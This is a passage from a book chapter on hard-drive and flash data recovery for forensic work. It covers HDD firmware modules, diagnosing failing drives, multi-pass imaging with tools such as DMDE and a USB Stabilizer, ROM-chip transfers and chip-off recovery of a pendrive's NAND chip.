  • 229. Chapter 12 - Data recovery 222 If you think about the start-up process of the HDD, then from the perspective of the firmware, the ROM chip is read first, then the servo subsystem, then the read/write subsystem and then everything else is loaded to provide access to the user data. If this process is not completed, it is not uncommon to have read and write access to the service area but not to the user data. Most of the commands that allow access to the firmware are manufacturer-specific and unfortu- nately not documented - at least not publicly! There are some data recovery laboratories that have access to confidential company-internal doc- uments of the manufacturers with the documentation of various firmware versions, manufacturer- specific ATA commands or the like and sometimes also pass them on to others on the sly. In many areas, leaked information like the ones mentioned above or reverse engineering is the only source of information. Some basic information can be found online as well as in firmware tool manuals. Anyone who starts looking into this will have to invest some time here and read up accordingly whenever new information is encountered. Important parts of the firmware As you already know the service area is divided into modules, of which certain modules are essential for the operation of the disk and others are not necessary. If a disk cannot read data from copy 0, then it will usually try to read from copy 1. It can therefore take a while before an HDD reports that it is ready. The firmware often makes several read attempts before switching to the next copy. The more modules are damaged, the longer this can take. I’ve seen hard drives which needed several minutes to become ready. Some modules are unique to each disk and other modules are the same for all disks with a specific firmware version, or even for all disks of an entire model range. Damaged modules that are not individual for each hard disk can often be loaded from donor disks or obtained from the Internet and then used to repair a customer disk. Within the firmware sectors, there is another type of addressing - the so-called UBA addressing (Utility Block Address). Sometimes it’s also called the Universal Block Address - that’s because manufacturers of data recovery tools don’t have access to the firmware developer’s documentation and find out most of it by reverse engineering and then just naming things themselves. That is why the individual terms also differ between the individual firmware tools (PC-3000, MRT, DFL). The following parts can be found in one or another way on each HDD firmware and it’s very important to understand these things to recover data from an HDD. P-List This list includes sectors that were defective at production time. That’s why it is called primary, permanent or production time defects list. That the hard disk is not forced to execute jumps with
  • 230. Chapter 12 - Data recovery 223 the head from the beginning due to unmapped sectors, the sectors that were already defective at production time are skipped and the LBA-numbering is structured in such a way that it is consecutive from sector 0 to N and the defects in between are simple are skipped: 12.1 - P-list This also show how the PBA (physical block addressing) differs from LBA (logical block addressing). The P-List is one of that modules that are unique to each hard drive and cannot be replaced. G-List The growing defects list or G-List is a list of sectors that fail during operation. To avoid having to move several TB of data by one sector in the worst case, a defective sector is replaced with the next free reserve sector during operation: 12.2 - G-list If a read- or wite- error occurs, the sector is marked as defective and mapped out on the next opportunity when the disk is idle. This happens in so-called background-processes which start in most cases after 20 seconds of idle-time. That’s why professional data recovery labs disable unnecessary background activities in order not to corrupt data and save the disk unnecessary work. If you do not have that option, you need to pay attention to the drive and don’t let it run when it is not in use. If the G-List is lost, data will be damaged because sectors mapped out during operation are reset to the old locations. However, this can also be used in a forensic investigation to recover old data fragments in the sectors which got mapped out, even after the disk has been wiped. However, this also means that a hard disk becomes slower and slower the more unmapped sectors there are because the more often the head has to make jumps to the new location of a LBA when reading the data. Depending on the manufacturer/model series, this is slightly different. Many disks have smaller reserve areas distributed over the platters to minimize any necessary jumps and the associated loss
  • 231. Chapter 12 - Data recovery 224 of performance. Translator The translator is the module that converts the LBA address into the corresponding arm movement. If the translator is defective, you have no access to the data. It is relatively easy to test whether the translator has a problem. Zone tables Zones make it possible to use a different number of sectors per track. The old CHS (Cylinder, Head, Sectors) addressing assumed that each track or cylinder had the same number of sectors. Since the radius of the cylinders decreases with each step in the direction of the spindle, a lot of space would be wasted if the outer cylinders had the same number of sectors as the inner cylinders. Here is a simplified graphic representation for comparison: 12.2 - HDD with and without zone tables What is graphically displayed here is saved by the zone table in a form that can be used by the firmware. Without this data, it would not be possible to calculate the location of a specific LBA address is on the platters! Servo parameters/Servo adaptive parameters This data is used to fine-tune the head and is unique to each hard drive. Incorrect data can lead to the head no longer reading or only reading with reduced performance. There are often different data sets for the service and user area. Security-relevant data/passwords Some encryption methods save the passwords on the hard disk in the service area. In these cases, passwords can be easily read out or removed with access to the firmware modules.
  • 232. Chapter 12 - Data recovery 225 Firmware/overlay code To put it simply, these are program instructions that are loaded into the main memory of the HDD when required. As with very old computers, the working memory of hard disks is very limited and therefore developers have to be careful with it. Depending on the context in which these terms are used, it is code that is loaded when required, like a DLL, or code that is loaded from the service area and overwrites the first rudimentary program parts loaded from the ROM. In any case, the term is more common for special code parts that are loaded into the RAM of the HDD when needed and then replaced with other code parts in the RAM when the function is no longer needed. S.M.A.R.T. data S.M.A.R.T. was developed to warn the user before a hard drive fails. Often S.M.A.R.T. however, is the cause of such a failure. When the S.M.A.R.T. log becomes corrupted and contains invalid data that the disk cannot process, causing the disk to fail to fully boot and never report that it is ready. Since S.M.A.R.T. is not essential for operation, deleting the S.M.A.R.T. data and disabling the S.M.A.R.T. functions is the simplest solution to this problem. Serial number, model number and capacity In many cases, the serial and model numbers are read from the service area. If a hard drive shows the correct model and serial number, as well as capacity and firmware version, this is a very strong indicator that the head can at least read the service area. If there is no access to the user data, but the above-mentioned values are displayed correctly (data recovery technicians call that a “full ID”), you can determine with a high degree of certainty that at least one head is OK and can read. Safe mode Hard drives have a safe mode that they go into if some part of the firmware is corrupt. This is manifested by multiple clicks, shutting down and restarting the motor and then starting again. Smaller 2.5” laptop drives often just shut down and don’t try multiple times. PC-3000 recognizes this problem itself and shows us that a hard disk is in safe mode. You can also put the hard drive into safe mode on purpose. The hard disk then waits for suitable firmware to be uploaded to the RAM. This is also referred to as a “loader”. Once the loader has successfully uploaded and is running, you can start repairing corrupted firmware modules.
  • 233. Chapter 12 - Data recovery 226 Status and error registers Besides the noise and behaviour of a drive there are status information which can be displayed by some data recovery tools like DDI, MRT, PC-3000 and DFL. But there are also some free tools which show these status flags like Victoria²⁷³ or Rapid Disk Tester²⁷⁴. 12.3 - status flags from MRT These indicated status LEDs also help with diagnostics. BSY means “busy” and indicates that the disk is working. It’s OK to leave an HDD or SSD on BSY for a while and wait, as long as the disk isn’t making any weird noises! BSY is the first status that the HDD shows before the firmware is fully loaded. Here I monitor an SSD with a thermal camera and an HDD with a stethoscope. DRD stands for “drive ready” and means that the hard disk is ready to receive commands. DSC means “drive seek complete” and indicates that the head has moved to a specific position. DWF means “drive write fault” and should always be off. DRQ means “data request” and is set when the data carrier is ready to transfer data. CRR stands for “corrected data” and should always be off. IDX means “index” and should always be off. ERR stands for “error” and indicates if an error occurred with the previous command. The error is then described in more detail by the following error codes: • BBK (bad block) • UNC (uncorrectable data error) • INF (ID not found) • ABR (aborted command) • T0N (Track 0 not found) • AMN (Address marker not found) The abbreviations can differ hereby from tool to tool. Diagnosing the issue Until now you have learned how to get a better picture of the inner processes of an HDD so it’s time to use that knowledge practically… ²⁷³https://hdd.by/victoria/ ²⁷⁴https://www.deepspar.com/training-downloads.html
  • 234. Chapter 12 - Data recovery 227 It would be hard to describe some of the sounds you may hear when a drive has a certain issue – luckily a data recovery lab has recorded a lot of sound samples and offer then on their homepage. You can find the files here²⁷⁵. If a disk spins up but then gets stuck in the BSY state, this indicates that parts of the firmware are corrupt or unreadable. Or background processes are running on the hard disk that hangs or takes a long time to finish. It can be also due to issues reading the firmware from platters. If the drive sounds OK then wait a few minutes and see if the drive come ready. If a drive is not ready within 10-15 minutes, then it’s highly unlikely it will become ready when you wait longer. Most likely you will need a firmware-tool and the proper knowledge to deal with that issue. If a disk reports readiness but reports unusual values - eg: 0 GB or 3.86 GB for the capacity. Then an essential part of the firmware may be corrupted or only the part from the ROM chip could be read. It’s also possible that the ROM chip is wrong (e.g. an amateur attempting a data recovery and just swapped the PCB) or the head is damaged and can’t read the data from the service area or an early loaded firmware module is corrupted. If the head keeps clicking, it can sometimes indicate a firmware problem or the wrong ROM chip on the PCB. But much more likely the head could be defective and not find the service area because it can no longer read anything. I’ve also seen these symptoms when the ROM chip was defective. The more experience you gain, the better you will be at assigning noises, status LEDs and other indications from the hard drive to a specific problem. You don’t learn data recovery overnight! Before cloning the drive try to read the first sector, if that works, read the last sector and at least one sector in the middle of the disk. If you can read the drive until a specific LBA and sectors after this LBA are unreadable it could either be a defective head or the translator (sometimes also called the address decoder). A defective head mean you can read until some point then you have a group of unreadable sectors and after the sectors of the defective head you can read again some data. If the translator is damaged you can’t read after a certain LBA not a single sector. To test which issue you may face you can try to read more sectors (maybe 10 or 15) distributed across the entire surface. Another good indication are the S.M.A.R.T. values. The fact you can read the S.M.A.R.T. values itself mean that the heads are good and able to read at least the service area and it also mean that the firmware is loaded at least until the S.M.A.R.T. module which mean basically all the critical modules are loaded. The values itself tell you more important information: • 0x05 (Reallocated Sectors Count) tells you how much bad sectors got reallocated • 0x0A (Spin Retry Count) tells you how often the drive trys to spin up multiple times until it reach the desired RPM. This can indicate a mechanical problem. ²⁷⁵https://datacent.com/failing_hard_drive_sounds
  • 235. Chapter 12 - Data recovery 228 • 0xBB (Reported uncorrectable Error) tells you how many Errors could not be corrected by ECC. This can indicate fading of the magnetic load on the platters when the drive was long time not in use or degradation of the head or magnetic coating. • 0xBC (Command Timeout) tells you how often a timeout occur while trying to execute a command. This can indicate sometimes problems with the electronics or oxidized data connections. • 0xC4 (Reallocation Event Count) tells you how many sector reallocations were done successfully and unsuccessfully. • 0xC5 (Current Pending Sector Count) tells you how many sectors are waiting for reallocation. This value is very important for forensics! In case the drive will be idle for longer than 20 seconds these sectors can get reallocated which could alter data. • 0xC6 (Uncorrectable Sector Count) tells you how many sectors were not corrected by ECC. The same as for 0xBB applies here. • 0xC9 (Soft Read Error Rate) tells you how much not correctable software read errors occurred. The same as for 0xBB applies here. In the context of 0x09 (Power On Hours Count) you can conclude if the errors indicate a production- issue and that for likely a rapid degradation of the drive (little amount of hours) or the normal degradation over time in case the drive was in use for many hours. The forensic importance of S.M.A.R.T. data I recommend getting the S.M.A.R.T. values before and after imaging. As you have learned until now – the drive will reallocate bad sectors when it stays to long in idle. This can cause big issues when someone else calculate the checksum of the drive and it do not match up with the checksum in your report. Even if you pay attention that the drive will never be in idle some other investigator may let the drive idle for a few minutes before calculating the checksum and thus this person alter the data. In such cases it’s wise to have the S.M.A.R.T. values reported before and after imaging that you can explain why the checksum don’t match up anymore. In a data recovery case, some drives may have trouble booting up due to a minor scratch in the service area which is very hard on the head when starting. So, you would not want to start the drive multiple times as you cannot know if the head or drive may survive the next start. If you are not able to deactivate background-processes like the reallocation of sectors, it’s in some cases necessary to accept the smaller risk and rather lose a few sectors then the whole drive. Of course, it would be the best way to outsource such a case to a professional data recovery lab but this is not always an option.
  • 236. Chapter 12 - Data recovery 229 Imaging of unstable HDDs The imaging of unstable HDDs follows an easy approach - first you want to get the low hanging fruits with a low stress-level for the drive and then you are going to fill the gaps and read the problematic areas. In more technical terms you need multiple imaging passes. In the first pass you use a small read timeout (300 – 600ms) so that the head is not working to long on bad sectors. The reading-process will look then like that: 12.4 - Simplified graphical representation the the read process If the data is delivered by the drive before the read timeout occurs then you save the data and continue to read the next block. If the timeout is reached the imaging device will send a reset command to cancel the internal read retries of the drive and then the imaging continue with the next block. That is why the read timeout is the most important setting for handling unstable drives! As longer a head is trying to read bad sectors as more the head can get damaged over time. There are some drives which have bigger areas of bad sectors – in such cases it is wise to skip a certain number of sectors to overcome the bad areas faster. If you are not sure the drive has experienced a drop or head-crash you can’t be sure there is no minor scratch on the surface. That’s why I set in my first imaging passes always a high number of sectors to skip (e.g. 256000) after a read error. This ensures that you skip over bad areas or tiny scratches very fast. If you have read all good sectors with a short read timeout you can run the next imaging pass with a longer timeout and re-read all blocks which are skipped in the last pass. If there are mainly skipped blocks on one pass and just occasionally read blocks then you have to increase the timeout until you read at least 2/3 of blocks. As you increase the read timeout with each pass, you should decrease the number of skipped sectors after a read timeout or read error with each pass.
  • 237. Chapter 12 - Data recovery 230 If your tool allows to create a headmap I would strongly suggest to do that before imaging. That way, you can see if there is a bad head or even a completely broken head so you can skip the sectors of that head in the first pass. In case a drive will not be identified but got stuck in BSY it may be one of the commands used to initialize the drive which cause the drive to hang. That’s why DDI allow to configure the commands used to initialize the drive. Sometimes a non-standard initialization procedure will allow a drive to become ready: 12.5 - DDI configuration of drive initialisation command sequence In case you change the identification procedure and the drive become ready but you cannot image a single sector you have to try another identification procedure so that the drive does not just become ready but also give you data access! Some imagers allow us to deactivate unnecessary functions of the drive like S.M.A.R.T., caching, sector reallocation, etc. The deactivation of unnecessary things makes the imaging not just a bit faster but also much lighter for the drive. If S.M.A.R.T. is enabled, the drive will have to update the S.M.A.R.T. data each time it hits a bad sector. This force the head to jump to the service area and write data and that is not just more “stress” for the drive but also a risk. In case the drive would write bad data into the firmware module the drive can develop a firmware issue and not boot anymore. That, or the module can grow too big and damage the following module in the service area resulting in the same problem. DDI has an option in the menu to deactivate such things (Source -> Drive Preconfiguration). This option deactivates things based on a preset from DDI but it doesn’t allow you to select specific things. A fully fledged firmware-tool like MRT will allow you to do that:
  • 238. Chapter 12 - Data recovery 231 12.6 - MRT edit HDD ID dialogue The next possible setting may be the read-mode. You can use the faster UDME-Modes or the older and slower PIO-Mode if some hardware-imager will allow you to set these things like DDI, MRT, DFL or PC-3000:
  • 239. Chapter 12 - Data recovery 232 12.7 - MRT read mode selection for an imaging task
  • 240. Chapter 12 - Data recovery 233 12.8 - DFL DE read mode selection for an imaging task The other modes like Read, ignore CRC are helpful in some cases – here does the DDI a fabulous job. MRT does exactly what the name suggests and read the data and write it to the image or target drive no matter if the checksum of the sector matches. DDI reads the sector in this mode multiple times and does a statistical analysis for each bit to get the most probable result instead of the first result the drive delivers. Each way is useful when the sector checksum is corrupted. In case a very weak head gives you bad data the statistical analysis of DeepSpar’s DDI would ensure that you get the best possible result but the trade-off of this would be a longer imaging-duration and much more stress on the head. That’s why this is not an option you should use on the first pass but rather on the last imaging pass! The idea behind using a slower read-mode is simple! An unstable drive can read maybe more stable in a slower speed. There are also cases where a firmware-part is damaged and the drive is highly unstable in UDMA for example but PIO would use another fully functional part of the firmware. Different read-commands also apply different procedures and, in some cases, you may be able to read bad sectors with another read-mode. That’s why I recommend using different Read-modes in different passes. The same apply for the read method (LBA, CHS, …)! The last option I want to mention is the imaging direction - forward or backward. In backward- imaging the drive is bypassing the cache and that’s how you can overcome issues with the cache. That makes the imaging-process also much slower but slow imaging of good data is much better then fast imaging of data corrupted by the cache! You can also see that different Tools offer different levels of control and different options. If I need to use the ignore CRC option, I would use for sure the DDI and not the MRT and DFL would not even give me that option at all. In case of mode-control DFL would give me more granular control.
  • 241. Chapter 12 - Data recovery 234 That’s also why a full-blown data recovery operation need a lot of different tools to select the tool which fits best for each job. There are even more options to optimise the imaging. One of them would be the reset-commands. You may choose between hardware- and software-reset. Some drives may process one of that resets much better or faster than the other. I have even seen drives freezing when issuing the “wrong” reset command. Practical example – imaging a WD40NMZW with the Guardonix writeblocker This is a drive I have recently recovered and the drive is highly unstable and is has a lot of bad sectors with a very weak head because the local PC repair shop has tried to recover the data by scanning the drive with a data recovery program which took multiple days because of internal read-retries. Finally, the head got that much damaged that Windows started to hang when the drive was directly connected and after a while Windows just dropped the HDD. This is also a good example for the damage a wrong data recovery approach can cause. At least the head is not totally dead – so you have something to work with. I was thinking about that example for a while and I think the most useful tool for a forensics lab would be the USB stabilizer. This tool is the “bigger brother” of the Guardonix writeblocker and it allows you a bit more control. It can be also used with firmware-tools so if you are thinking about data recovery this would be my recommendation for the lowest you should go. If not used for data recovery the USB Stabilizer works as a USB-writeblocker and as you may know basically every storage device can be adapted to USB. So, it you are starting out in forensics this is the tool which gives you the most options. That makes this quite an extreme example – you have the lowest-end tool and a data recovery case which is at least a medium to a higher difficulty imaging job. So that will be also a good test to see what the USB Stabilizer can do! This case also gives me the opportunity to demonstrate another procedure in data recovery. A USB to SATA conversion for Western Digital drives. This is basically the same procedure as for a PCB-swap, you just swap a USB-PCB with a SATA-PCB. Before I explain how that’s done, I want to show you what data is stored in the ROM-chip on the PCB:
  • 242. Chapter 12 - Data recovery 235 12.9 - List of firmware modules on a Western Digital ROM chip As you see on the image the modules 0x30 and 0x47 contain the service-area (SA) translator and SA adaptive parameters. These two modules make each ROM-chip unique for each drive. That’s why you have to transfer the ROM-chip from the original PCB to the new PCB. That is not just valid for WD drives but for each manufacturer! To check which chip is the ROM-chip I usually search the PCB-Number (2060-######-### Rev X in terms of WD PCBs) + the word donor in Google Images. This brings usually images from specialized retailers of donor drives and PCBs. Some of them have marked the ROM-chips on their images. I validate this also by searching on Google for the datasheet of the marked component. If that is indeed a SPI flash chip or something like that you have confirmed that this component is the ROM chip. There are some PCBs where you have an empty space for the ROM-chip. This mean the data is in the MCU (micro controller unit) and the ROM-chip gets used in later versions to patch the MCU with newer code. In that cases you have to transplant the MCU from the original PCB without a ROM-chip and remove the ROM-chip from the donor PCB if there is one. Usually, you have also another component on the PCB which act as a switch to activate the ROM-chip. This have to be also removed. In case the original PCB has a ROM-chip but the donor PCB doesn’t, you have to transfer the ROM- chip and the 2nd component used as a switch.
  • 243. Chapter 12 - Data recovery 236 12.10 - ROM-chip transfer for PCB-swap This is often needed for imaging as a USB interface is not that stable as SATA but that gets also used in case a PCB is damaged. Now I am using a Axagon Fastport2 adapter to connect the HDD with my USB Stabilizer. So, I am basically reverting the SATA conversion I had done to image the drive with MRT. The first step is to get the drive to ID. To see if the drive is recognised, I open the Log-Tab and activate the power supply in the USB Stabilizer Application:
  • 244. Chapter 12 - Data recovery 237 12.11 - USB Stabilizer Log-tab If you have a 3.5” drive you can use a USB-dock. In that case you have to activate power first in the USB stabilizer and then power on the dock. Then you have to select the drive in DMDE:
  • 245. Chapter 12 - Data recovery 238 12.12 - DMDE drive selection and USB Stabilizer Settings-tab I have chosen DMDE²⁷⁶ because the tool is pretty cheap, powerful and it is also great for analysing filesystems. That make that program a good choice for data recovery and even quite useful for forensics. In the Settings-tab of the USB Stabilizer application are controls for the device-type (HDD or SSD) which effect the handling of resets, the reset type (software, hardware, controller, …) and finally the read timeout. So, you have the most important setting for imaging speed and stress-level of the drive as well as resets which can cause instability issues. That means you have the most basic controls. The checkbox Turn Off Drive if Inactive is also helpful to prevent that the reallocation of bad sectors will damage data and the drive before you start another imaging pass. But that only work with 2.5” drives as they can be directly powered over USB and thus the USB Stabilizer can power them off. With the Commands-button you can issue resets manually or you can log the S.M.A.R.T. data as I would suggest before and after forensic date acquisition. To sum that up so far, you are using here the lowest end data recovery tool with a cheap data recovery program on a medium until moderate difficult case for professional data recovery tools. A case which took a 5x more expensive and much more flexible tool over a week to image. After you select the disk, you see the following initial scan dialog: ²⁷⁶https://dmde.com
  • 246. Chapter 12 - Data recovery 239 12.13 - DMDE initial scan DMDE try to read the first sectors and this drive have a bad LBA 0 (MBR) which can’t be read. DMDE sees that because I have set the USB Stabilizer to report read errors back to the OS so that the Software can log them correctly. This is why DMDE displays the following error: 12.14 - DMDE read error You can select “Ignore all” and cancel the further processing of the partition table. First, you want to clone the drive and then you run the logical data recovery on the image file. DMDE allow you to control a few other parameters while imaging. First, you need to set the LBA range and the target:
  • 247. Chapter 12 - Data recovery 240 12.15 - DMDE imaging settings - Source and destianation This dialog should be pretty self-explanatory. DMDE just allow you to create a RAW-image. More advanced tools will allow you to do create VHD, VHDX or some other kind of sparse-files which will save you a lot of space on the target drive. The next settings need to be done in the Parameters-tab: 12.16 - DMDE imaging settings - Parameters and Source I/O Parameters First, you should create a log-file. This file stores an overview about read, unreadable and skipped
  • 248. Chapter 12 - Data recovery 241 sectors. You can also select to image in reverse in that dialog. I unchecked Lock the source drive for copy as the USB Stabilizer act as a writeblocker anyway. For the 2nd pass you can select here also to retry bad sectors. This make sense because many of the bad sectors will be retrieved with a longer read timeout. A click on the Parameters-button opens the 2nd window. Here you can select in the Ignore I/O Errors-tab which fill-pattern should be used for bad and skipped sectors and how many sectors will be skipped after a bad sector. This setting allows you to overcome bad areas quicker. From my experience with that drive, I choose 25600 for the first pass. In MRT I used 256000 in the first try but I realized that I skip too much sectors and I realised that there are bad areas all over the surface. So, I was pretty certain that I am not dealing with local issues like a minor scratch. That’s why I lowered the skipped sectors on MRT after the 15% or 20% mark also to 25600. I still keep it quite big for the first pass as I realized with a much smaller setting that the bad areas are 20000 – 80000 sectors wide – so 25600 was a good size to skip them in 1 to 4 steps. As I told - get the low hanging fruits first because you never know if the drive may die on you in the first pass! DMDE shows you the total number of read and skipped LBAs: 12.18 - DMDE imaging progress The Action-button let you cancel the imaging or change the I/O settings while you imaging. That let you finetune skip-settings on the fly. The Sector Map-tab shows the imaging progress:
  • 249. Chapter 12 - Data recovery 242 12.18 - USB Stabilizer first imaging pass You see here very well how the imaging works – the spikes where the drive read with decent speed is broken up by bad areas which got skipped. For the 2nd pass I use the following settings:
  • 250. Chapter 12 - Data recovery 243 12.19 - DMDE imaging settings - Source and destianation With MRT I had used 3 passes – one with 2560 sectors which got skipped and a 2 or 3 second timeout instead of 500ms and then a 3rd imaging pass with sector by sector reading reverse in PIO mode and 10 seconds read timeout. Here I don’t have PIO and I expect the 2nd pass to end in the middle of the night or early morning which would throw my time comparison with MRT totally off. I decided to go straight away with 2560 sectors skip, 10 seconds of read timeout and I read the skipped sectors in reverse. This will read until the next bad sector occurs and mark all between the first and first found bad sector in reverse reading as bad. This is not perfect but it will get the job somehow done. The imaging is occasionally painfully slow but I read basically most of the sectors:
  • 251. Chapter 12 - Data recovery 244 12.20 - USB Stabilizer second imaging pass Finally, the USB Stabilizer and DMDE did image the first 10% of the drive in a bit more then 1,5 days and my 1 for 2 passes “hack” did cause a few more bad sectors then MRT delivered in almost exactly 1 day. The whole job would run approximately 16-17 instead of 10 days, which is really good for a tool like that. I still have maybe some room for improvement but I need to say I am impressed again by DeepSpar’s USB Stabilizer! Last but not least I would recommend cooling of a drive which have to work 24h per day for multiple days to get imaged. An old case-fan and an old power-supply of a SATA to USB converter cable does this job in my lab.
  • 252. Chapter 12 - Data recovery 245 Flash drive data recovery Storage devices based on flash-memory need to be handled differently. To understand how data recovery for such devices works you need to understand how that devices function and how the manufacturers deal with certain limitations of that technology. Flash drives are faster because there are no moving parts and this also eliminates any kind of mechanical failure or mechanical degradation over time. The data is stored in memory-cells in the form of an electric charge. These cells degrade as data is written to them. That means the vendors have to come up with some clever ideas to prevent flash-drives from failing too soon. Strongly generalized these measures are: • Wear leveling which ensures that writes are distributed evenly across all memory cells • Obfuscation/randomisation of data to ensure there are no patterns which can cause an uneven wear within a memory-page (a group of memory-cells and the smallest unit which gets written to). • A good supply of spare space to replace failing memory-cells, pages or blocks (a group of pages and the smallest unit which can get erased). Board-level repair First of all, you need to know if the issue is hardware- or firmware-related. The easiest approach is to repair a hardware defect like a broken connector or a blown/shorted capacitor. All you need for this is a soldering-station, tweezers and in the most cases a microscope. Fully encrypted devices Then you need to distinguish between fully encrypted and obfuscated devices. Basically, all SSDs use a full hardware encryption to obfuscate and randomize data. This is also true for a tiny fraction of pendrives. To recover data from these devices you need professional data recovery tools like: • PC-3000 UDMA²⁷⁷/Express with SSD plug-in (does not support NVMe SSDs) • PC-3000 Portable III²⁷⁸ with SSD plug-in (also supports NVMe SSDs) • MRT Express²⁷⁹ with SSD plug-in (supports just a few SATA SSDs) The process in a very generalized form is quite easy. You need to short some Pins on the SSD to put the device in so-called technology mode to allow the data recovery hardware to upload a so-called loader. ²⁷⁷https://www.acelab.eu.com/pc3000.udma.php ²⁷⁸https://www.acelab.eu.com/pc-3000-portable-iii-systems.php ²⁷⁹http://en.mrtlab.com/mrt-pro
  • 253. Chapter 12 - Data recovery 246 This loader will restore access to the data if the device is supported. The good news is that many devices are nowadays based on the same controllers (e.g. Phison) but you are still very far from the over 90% success-rate a data recovery lab can reach with HDD cases. If the device is not supported an investigator could theoretically reverse-engineer the firmware of a working model and try to find the issue. This is basically what the vendors of data recovery tools do. To do that for a single case would be an enormous amount of work and this would not fit within the budget and/or time-frame for a normal investigation. So, if the device is not supported, you are usually out of luck. Without a somehow working firmware which handles decryption of data and the translation from LBA addresses to the correct memory location you are not able to get any data at all. Chip-off data recovery Most pendrives and memory-cards do not have hardware-encryption. This is the reason why that devices can be handled in a so-called chip-off data recovery. As the name suggest memory chips get removed and you are going to read the data directly from the NAND chips. If you do so, you have to reverse the things which are done to the data when recording. This is usually the job of the controller but if you are doing a chip-off you skip the controller and have to do his work yourself. I will demonstrate the process with PC-3000 Flash²⁸⁰ and a pendrive chip-off recovery. I choose PC- 3000 Flash because Ace Lab do offer the best support in the data recovery field and PC-3000 Flash comes with a large database of already known working solutions. This makes it much easier to get started! The only available alternative is VNR from Rusolut²⁸¹. This tool doesn’t offer a database with already known solutions but the tool is very sophisticated and powerful. The third vendor (Flash extractor) went out of business and the tool is just available used and there is no professional support or further development anymore. That’s why I would not recommend that at all. The process is basically on all tools the same but the way how to handle a case are different. If you understand the general process, you will be able to work with each tool! Desoldering and preparation First you have to desolder the memory chip: ²⁸⁰https://www.acelab.eu.com/pc3000flash.php ²⁸¹https://rusolut.com/
  • 254. Chapter 12 - Data recovery 247 12.21 - pendrive with one NAND chip and USBest controller This is a very old USB pendrive with a USBest controller (model UT163-T6). Since the controller model was hard to read, I used a little trick. I painted the surface of the controller with a paint pen and then carefully cleaned the surface with a swab dipped in 99% isopropyl alcohol. After this only a little paint remains in the recesses on the controller and the text is very easy to read. Here you have a TSOP48 chip. This package has 48 legs (24 on each side) and is by far the most commonly used design for NAND chips. This is simply due to the fact that this design does not require any special additional equipment for pick-and-place machines and thus saves manufacturers additional investments. For desoldering I use my Yihua YH-853AAA all-in-one soldering station:
  • 255. Chapter 12 - Data recovery 248 12.22 - Yihua YH-853AAA with pendrive after desoldering of the chip This soldering station offers a soldering iron, a preheating plate and a hot air nozzle in one. For small boards such as USB sticks or SD memory cards, I usually use a “third hand” to hold the boards. This makes it easier to fix the small boards in the right place. First, I activate the preheating plate and let it heat up to 180°C. At the same time, I put a little flux on the contacts and as soon as the 180°C has been reached, I activate the hot air nozzle with about 200°C for 30-40 seconds. I do not use an attachment for the hot air nozzle for larger components like this TSOP48 chip. For TSOP48 chips, there are also special attachments that primarily direct the hot air to the legs. I would also recommend these to beginners to make the process even gentler. The procedure I described is intended for BGA chips that do not have legs, but pads on the underside of the chip. But I also handle TSOP chips this way… Then I swing the hot air nozzle away and use the soldering iron with a little lead-containing solder to lower the melting point of the lead-free solder on the board. To do this, I quickly solder the contacts at a set temperature of 400°C with leded solder. Then I swing the hot air nozzle back, I increase the temperature to about 380°C at my hot air station and I use a fairly low air flow to avoid blowing small components off the board! To pick up the chip I use then a vacuum lifter.
  • 256. Chapter 12 - Data recovery 249 I recommend you to practice this with an old pendrive. If you can solder the chip several times in and out with the stick still working afterwards, you are ready for the first real cases. Do not take the values I mentioned as given, but find the right values for your soldering station! The temperature specifications depend on the sensor and the position of the sensor. I know from an experiment with a thermal imaging camera that a setting of 400°C corresponds to about 350°C at the tip of my soldering iron. Depending on the distance and other factors, the set temperature is very different from the temperature acting on the chip. In general, you want to solder so hot that you can remove the chip in a few seconds and not heat the chip at 300°C for multiple minutes. Therefore, it is important to find suitable settings on your own soldering station. But you don’t want to solder so hot that chips get damaged! With more expensive soldering stations, the set values will tend to be closer to the actual values. My Yihua station is a quite cheap but also very compact model and has served me well for years. You are welcome to invest a 4-digit number into Weller or JBC equipment, but for the amount of soldering work I do, it would be overkill. A training phase to get to know the equipment will be necessary even with high-quality soldering stations… As soon as the chip is removed, it is necessary to clean the contacts. I use a small piece of desoldering wick that I cut off. Copper is a good conductor of heat and you want to clean the contacts with the desoldering wick and not heat 3 meters of the desoldering wick. That’s exactly why I cut off a 1.5 – 2cm long piece. I place the chip on a silicone solder mat, put some flux on the legs and then I put the desoldering wick on the legs. Then I use the soldering iron with the previously mentioned 400°C as temperature setting and a slightly wider chisel tip to transfer as much heat as possible. Do not try to push the wick back and forth – you would risk to bend the legs. Also make sure to heat the desoldering wick continuously before removing it so that it does not adhere to one of the legs. If you have problems to detach the desoldering wick from the legs, don’t use force, but use the hot air nozzle at 300°C to “help” the soldering iron. This allows you to remove the desoldering wick within seconds. With BGA chips, the desoldering wick can be easily pushed over the pads, if it has the right temperature. Do not apply force here either! The pads are torn off faster than you think! As soon as the right temperature is reached and enough flux is used, the piece of desoldering wick glides over the contacts as if by itself. After both sides of the legs are free of solder, I use a very soft toothbrush and a few drops of isopropyl alcohol to clean the chip roughly. Then I use cotton swabs dipped in IPA to clean the silicone mat and the chip.
  • 257. Chapter 12 - Data recovery 250 Afterwards the chip can be inserted into the reader. Alternatively, you can tin the matching adapter board and solder the chip. I always use lead-containing solder to keep the soldering temperature a little lower. If a TSOP48 chip is not detected in the corresponding adapter, this may be due to residues of rosin- containing fluxes or oxidation of the legs. In this case, it is often helpful to place the chip with the legs facing down on a hard surface and carefully clean the top of the leg with a scalpel: 12.23 - Cleaning TSOP-48 legs with a scalpel For data recovery, I note the last two digits of the case number. For this book I used single-digit numbers for the examples in order not to confuse these chips with a real data recovery! Each chip has a marking for the Pin 1, a Latin number for the case and a roman numeral for the chip position on the PCB. Practical example - chip-off recovery for an old 512MB pendrive Once the chips have been prepared, you can read them with PC-3000 Flash. To do this, you must first generate a new case. When you start the software of PC-3000 Flash, you see the following dialog:
  • 258. Chapter 12 - Data recovery 251 12.24 - Select adapter dialog Here you tick Use adapter and then you click OK. In the next step you are asked for a folder name of the case: 12.25 - Setting the case name
  • 259. Chapter 12 - Data recovery 252 I always name the folder with the case number and the prefix DR for data recovery and FI for forensic investigation. Here I use DR_12345 as an example. Then you have to determine where the data should be read from: 12.26 - Device selection dialog Here you can either select the PC-3000 Flash Reader (first line) or a USB device like the DeepSpar USB Sabilizer shown here. So, you can easily use PC-3000 Flash also for a logical data recovery. Also, you could load a dump from a file. I use the USB chip reader for this example. Confirm the selection with Next>. In the next step, you need to provide the key data of the case:
